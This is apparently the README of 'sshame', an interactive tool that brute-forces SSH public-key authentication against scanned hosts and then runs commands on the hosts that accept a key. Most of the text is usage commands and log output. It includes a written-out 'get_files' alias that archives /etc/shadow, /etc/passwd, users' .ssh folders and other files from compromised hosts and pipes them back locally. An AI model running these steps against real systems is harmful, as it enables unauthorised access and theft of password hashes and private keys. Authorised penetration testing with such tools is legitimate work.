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brute force SSH public-key authentication
sshame - brute force SSH public-key authentication
Interactive tool to brute force ssh public key authentication. Primarily intended for pentration testers. Sshame can execute commands on remote hosts.
Installing from Github
Clone the source from Github:
git clone
cd sshame
Then in order to install run:
python -m pip install .
In case you want to contribute instead of install run:
python -m pip install --editable .
Installaling via PyPI
will install the latest release.
pip3 install sshame
Basic usage
sshame is interactive, based on
# sshame
Type help to get a list of commands:
(sshame) help
Documented commands (type help <topic>):
commands creds exploit hosts keys resolve session
alias help macro py record run_script shell
edit history playback quit run_pyscript set shortcuts
Add target hosts
In the sshame shell run hosts -a list-of-ip-ranges-or-hosts [-p port]
(sshame) hosts -a -p 22
Scanning on port(s) 22
Received 877 packets, got 222 answers, remaining 34 packets
2019-08-25 19:22:15,633 sshame [I] 'Adding host (port open): 22'
2019-08-25 19:22:15,683 sshame [I] 'Adding host (port open): 22'
2019-08-25 19:22:15,686 sshame [I] 'Adding host (port open): 22'
sshame will scan the given hosts with scapy and add those, which have the port open.
To verify added hosts with TCP port open run hosts -l
Load ssh keys
Load private keys with keys -a glob_path [-p list-of-passwords]
(sshame) keys -a test/**/*key
2019-08-25 19:30:40,613 sshame [I] "Adding ssh keys from: ['test/**/*key']"
2019-08-25 19:30:40,614 sshame [I] "Discovered 4 files in 'test/**/*key'."
2019-08-25 19:30:40,615 sshame [I] 'Going to examine 4 files.'
2019-08-25 19:30:40,635 sshame [I] 'Importing ssh-dss key: test/keys/dsa_key'
2019-08-25 19:30:40,645 sshame [I] 'Importing ssh-rsa key: test/keys/rsa_key'
2019-08-25 19:30:40,680 sshame [I] 'Importing ecdsa-sha2-nistp256 key: test/keys/ecdsa_key'
2019-08-25 19:30:40,693 sshame [I] 'Importing ssh-ed25519 key: test/keys/ed25519_key'
Loaded 4 unique keys, ignoring 0 duplicates
-p list-of-passwords
is optional in case you load encrypted private keys protected with passwords.
List loaded keys with keys -l
Test keys on hosts
To brute force which keys authenticates on which target run test_keys -u list-of-users
(sshame) test_keys -u root admin
2019-08-25 19:34:31,900 sshame [I] 'Preparing target jobs...'
2019-08-25 19:34:31,933 sshame [I] 'Matching keys - 16 jobs scheduled'
Completed: [####################] [100.00%]
2019-08-25 19:34:56,857 sshame [I] '---------------------------------------------------------------------------'
List matching keys with creds -l
(sshame) creds -l
[1/1/1]: ssh -i test/keys/rsa_key [email protected]
[2/2/1]: ssh -i test/keys/dsa_key [email protected]
Run commands on remote hosts
To run commands on remote hosts use run_cmd -c command
, e.g.:
(sshame) run_cmd -c whoami
2019-08-25 23:28:22,757 sshame [I] 'Preparing target jobs...'
2019-08-25 23:28:22,763 sshame [I] 'Executing commands - 2 jobs scheduled'
Completed: [####################] [100.00%]
2019-08-25 23:28:23,993 sshame [I] '---------------------------------------------------------------------------'
Show command results
With commands -r
diplay the results:
(sshame) commands -r
Entries: 2
| guid | host_address | host_port | username | cmd | exit_status | output | updated |
| 434f163a-24b5-4775-a3c1-6ea41745b18d | | 22 | root | whoami | 0 | root | 2019-08-25 21:28:23 |
| 305e3f5d-bf4d-4024-981a-59b2dddebbcd | | 22 | admin | whoami | 0 | admin | 2019-08-25 21:28:23 |
Pipe remote commands to a local shell
Define an alias get_files
for a remote command tar -cf - /etc/passwd /etc/ldap.conf /etc/shadow /home/*/.ssh /etc/fstab | gzip | uuencode /dev/stdout; exit 0
and pipe it to a local uudecode -o - |tar xzf -
, with:
commands -a get_files "tar -cf - /etc/passwd /etc/ldap.conf /etc/shadow /home/*/.ssh /etc/fstab | gzip | uuencode /dev/stdout; exit 0" -p "uudecode -o - |tar xzf -"
exit 0
is to override tar's exit code in case of missing files.
Run te defined command with:
run_cmd -c get_files
The output you will find in the folder output/<host>_<port>/username/...
Session management
You may want to split wokloads into sessions. Use session name
to switch between sessions. Default session is
called 'default'.
Each session has its data stored in a separate sqlite db in the current directory named after the session
name, e.g. default.db
(sshame) session test
2019-08-25 23:38:38,283 sshame [I] 'Openning session: sqlite:///test.db'